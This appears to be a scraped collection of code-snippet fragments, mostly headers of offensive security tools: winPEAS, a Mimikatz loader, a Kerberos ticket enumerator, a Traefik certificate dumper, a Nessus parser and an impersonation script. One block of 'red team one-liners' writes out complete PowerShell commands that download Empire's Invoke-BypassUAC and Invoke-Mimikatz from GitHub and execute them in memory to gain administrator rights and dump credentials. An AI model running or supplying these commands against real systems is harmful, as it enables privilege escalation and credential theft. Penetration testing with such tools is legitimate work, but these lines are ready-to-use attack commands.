[email protected] / @JonTheNiceGuy / @g7vri
- Introduction
```powershell
function Invoke-winPEAS
{
    [CmdletBinding()]
    Param (
        [Parameter(Position = 0, Mandatory = $true)]
        [ValidateNotNullorEmpty()]
        [String]
        $Command
    )
```

```powershell
#requires -version 2
<#
Author: Noah
@subTee's reflexive loader
Required Dependencies: msbuild, csc
Execute: Run-UpdateKatz -Verbose
```

```powershell
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
```

```powershell
function Get-KerberosTicketGrantingTicket
{
    <#
    .SYNOPSIS
    Gets the Kerberos Tickets Granting Tickets from all Logon Sessions
    .DESCRIPTION
    Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associated Kerberos Ticket Granting Tickets.
```

```python
#!/usr/bin/env python
import argparse
import base64
import json
import os

def main():
    parser = argparse.ArgumentParser(
        description="Dump all certificates out of Traefik's acme.json file")
```

```python
#! /usr/bin/env python3.2
import xml.etree.ElementTree as etree
import shutil
import os

first = 1
for fileName in os.listdir("."):
    if ".nessus" in fileName:
        print(":: Parsing", fileName)
```

```powershell
param( [ScriptBlock] $scriptBlock )
<#
.SYNOPSIS
Impersonates a user and executes a script block as that user. This is an interactive script
and a window will open in order to securely capture credentials.
.EXAMPLE
Use-Impersonation.ps1 {Get-ChildItem 'C:\' | Foreach { Write-Host $_.Name }}
This writes the contents of 'C:\' impersonating the user that is entered.
#>
```